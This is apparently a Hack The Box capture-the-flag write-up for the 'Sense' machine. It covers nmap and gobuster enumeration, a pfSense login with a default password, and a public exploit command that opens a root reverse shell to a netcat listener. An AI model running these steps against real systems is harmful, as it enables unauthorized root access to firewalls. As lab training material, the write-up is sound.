HTB - Sense

Getting Root

Found a username named rohit under a text file we found using gobuster
Used the default password pfsense and logged in to the admin panel
From the admin panel we noticed the version was 2.1.3 and exploit-db had a python exploit which got us root access

Tools Used:

nmap, gobuster, searchsploit

Nmap

# Nmap 7.80 scan initiated Fri Mar 20 19:14:58 2020 as: nmap --script vuln -p 80,443 -oA nmap/Sense 10.10.10.60                                                                               
Nmap scan report for 10.10.10.60                                                                                                                                                              
Host is up (0.054s latency).                                                                                                                                                                  
                                                                                                                                                                                              
PORT    STATE SERVICE                                                                                                                                                                         
80/tcp  open  http                                                                                                                                                                            
|_clamav-exec: ERROR: Script execution failed (use -d to debug)                                                                                                                               
|_http-csrf: Couldn't find any CSRF vulnerabilities.                                                                                                                                          
|_http-dombased-xss: Couldn't find any DOM based XSS.                                                                                                                                         
|_http-passwd: ERROR: Script execution failed (use -d to debug)                                                                                                                               
| http-slowloris-check:                                                                                                                                                                       
|   VULNERABLE:                                                                                                                                                                               
|   Slowloris DOS attack                                                                                                                                                                      
|     State: LIKELY VULNERABLE                                                                                                                                                                
|     IDs:  CVE:CVE-2007-6750                                                                                                                                                                 
|       Slowloris tries to keep many connections to the target web server open and hold                                                                                                       
|       them open as long as possible.  It accomplishes this by opening connections to                                                                                                        
|       the target web server and sending a partial request. By doing so, it starves                                                                                                          
|       the http server's resources causing Denial Of Service.                                                                                                                                
|                                                                                                                                                                                             
|     Disclosure date: 2009-09-17                                                                                                                                                             
|     References:                                                                                                                                                                             
|       https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6750                                                                                                                          
|_      http://ha.ckers.org/slowloris/                                                                                                                                                        
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities. 
443/tcp open  https                                                                                                                                                                           
|_clamav-exec: ERROR: Script execution failed (use -d to debug)                                                                                                                               
|_http-aspnet-debug: ERROR: Script execution failed (use -d to debug)                                                                                                                         
|_http-csrf: Couldn't find any CSRF vulnerabilities.                                                                                                                                          
|_http-dombased-xss: Couldn't find any DOM based XSS.                                                                                                                                         
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.                                                                                                                              
|_http-vuln-cve2014-3704: ERROR: Script execution failed (use -d to debug)                                                                                                                    
| ssl-ccs-injection:                                                                                                                                                                          
|   VULNERABLE:                                                                                                                                                                               
|   SSL/TLS MITM vulnerability (CCS Injection)                                                                                                                                                
|     State: VULNERABLE                                                                                                                                                                       
|     Risk factor: High                                                                                                                                                                       
|       OpenSSL before 0.9.8za, 1.0.0 before 1.0.0m, and 1.0.1 before 1.0.1h                                                                                                                  
|       does not properly restrict processing of ChangeCipherSpec messages,
|       which allows man-in-the-middle attackers to trigger use of a zero
|       length master key in certain OpenSSL-to-OpenSSL communications, and
|       consequently hijack sessions or obtain sensitive information, via
|       a crafted TLS handshake, aka the "CCS Injection" vulnerability.
|           
|     References:
|       http://www.cvedetails.com/cve/2014-0224 
|       http://www.openssl.org/news/secadv_20140605.txt
|_      https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0224
| ssl-dh-params: 
|   VULNERABLE:
|   Diffie-Hellman Key Exchange Insufficient Group Strength
|     State: VULNERABLE
|       Transport Layer Security (TLS) services that use Diffie-Hellman groups
|       of insufficient strength, especially those using one of a few commonly
|       shared groups, may be susceptible to passive eavesdropping attacks.
|     Check results:
|       WEAK DH GROUP 1
|             Cipher Suite: TLS_DHE_RSA_WITH_CAMELLIA_128_CBC_SHA
|             Modulus Type: Non-safe prime
|             Modulus Source: RFC5114/1024-bit DSA group with 160-bit prime order subgroup
|             Modulus Length: 1024
|             Generator Length: 1024
|             Public Key Length: 1024
|     References:
|_      https://weakdh.org

Enumeration

Gobuster

/index.html (Status: 200)
/index.php (Status: 200)
/help.php (Status: 200)
/themes (Status: 301)
/stats.php (Status: 200)
/css (Status: 301)
/edit.php (Status: 200)
/includes (Status: 301)
/license.php (Status: 200)
/status.php (Status: 200)
/system.php (Status: 200)
/javascript (Status: 301)
'/changelog.txt (Status: 200)'
/classes (Status: 301)
/exec.php (Status: 200)
/widgets (Status: 301)
/graph.php (Status: 200)
/tree (Status: 301)
/wizard.php (Status: 200)
/shortcuts (Status: 301)
/pkg.php (Status: 200)
/installer (Status: 301)
/wizards (Status: 301)
/xmlrpc.php (Status: 200)
/reboot.php (Status: 200)
/interfaces.php (Status: 200)
/csrf (Status: 301)
'/system-users.txt (Status: 200)'
/filebrowser (Status: 301)
/%7Echeckout%7E (Status: 403)

Checking /changelog.txt

Checking /system-users.txt

We got username: rohit and a simple google search on pfsense default username and password shows that the default password is pfsense

We can successfully login and notice that the pfsense version is 2.1.3

Using searchsploit we find exploits/php/webapps/43560.py

Privilege Escalation

Running the exploit

# python3 43560.py --rhost 10.10.10.60 --lhost 10.10.14.55 --lport 9001 --username rohit --password pfsense  
CSRF token obtained
Running exploit...
Exploit completed

We get a shell as root

# rlwrap nc -lnvp 9001
Ncat: Version 7.80 ( https://nmap.org/ncat )
Ncat: Listening on :::9001
Ncat: Listening on 0.0.0.0:9001
Ncat: Connection from 10.10.10.60.
Ncat: Connection from 10.10.10.60:60055.
sh: can't access tty; job control turned off
# id
uid=0(root) gid=0(wheel) groups=0(wheel)
#

PreviousHTB - LaCasaDePapel NextHTB - October

Last updated 5 years ago

# Nmap 7.80 scan initiated Fri Mar 20 19:14:58 2020 as: nmap --script vuln -p 80,443 -oA nmap/Sense 10.10.10.60 Nmap scan report for 10.10.10.60 Host is up (0.054s latency). PORT STATE SERVICE 80/tcp open http |_clamav-exec: ERROR: Script execution failed (use -d to debug) |_http-csrf: Couldn't find any CSRF vulnerabilities. |_http-dombased-xss: Couldn't find any DOM based XSS. |_http-passwd: ERROR: Script execution failed (use -d to debug) | http-slowloris-check: | VULNERABLE: | Slowloris DOS attack | State: LIKELY VULNERABLE | IDs: CVE:CVE-2007-6750 | Slowloris tries to keep many connections to the target web server open and hold | them open as long as possible. It accomplishes this by opening connections to | the target web server and sending a partial request. By doing so, it starves | the http server's resources causing Denial Of Service. | | Disclosure date: 2009-09-17 | References: | https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6750 |_ http://ha.ckers.org/slowloris/ |_http-stored-xss: Couldn't find any stored XSS vulnerabilities. 443/tcp open https |_clamav-exec: ERROR: Script execution failed (use -d to debug) |_http-aspnet-debug: ERROR: Script execution failed (use -d to debug) |_http-csrf: Couldn't find any CSRF vulnerabilities. |_http-dombased-xss: Couldn't find any DOM based XSS. |_http-stored-xss: Couldn't find any stored XSS vulnerabilities. |_http-vuln-cve2014-3704: ERROR: Script execution failed (use -d to debug) | ssl-ccs-injection: | VULNERABLE: | SSL/TLS MITM vulnerability (CCS Injection) | State: VULNERABLE | Risk factor: High | OpenSSL before 0.9.8za, 1.0.0 before 1.0.0m, and 1.0.1 before 1.0.1h | does not properly restrict processing of ChangeCipherSpec messages, | which allows man-in-the-middle attackers to trigger use of a zero | length master key in certain OpenSSL-to-OpenSSL communications, and | consequently hijack sessions or obtain sensitive information, via | a crafted TLS handshake, aka the "CCS Injection" vulnerability. | | References: | http://www.cvedetails.com/cve/2014-0224 | http://www.openssl.org/news/secadv_20140605.txt |_ https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0224 | ssl-dh-params: | VULNERABLE: | Diffie-Hellman Key Exchange Insufficient Group Strength | State: VULNERABLE | Transport Layer Security (TLS) services that use Diffie-Hellman groups | of insufficient strength, especially those using one of a few commonly | shared groups, may be susceptible to passive eavesdropping attacks. | Check results: | WEAK DH GROUP 1 | Cipher Suite: TLS_DHE_RSA_WITH_CAMELLIA_128_CBC_SHA | Modulus Type: Non-safe prime | Modulus Source: RFC5114/1024-bit DSA group with 160-bit prime order subgroup | Modulus Length: 1024 | Generator Length: 1024 | Public Key Length: 1024 | References: |_ https://weakdh.org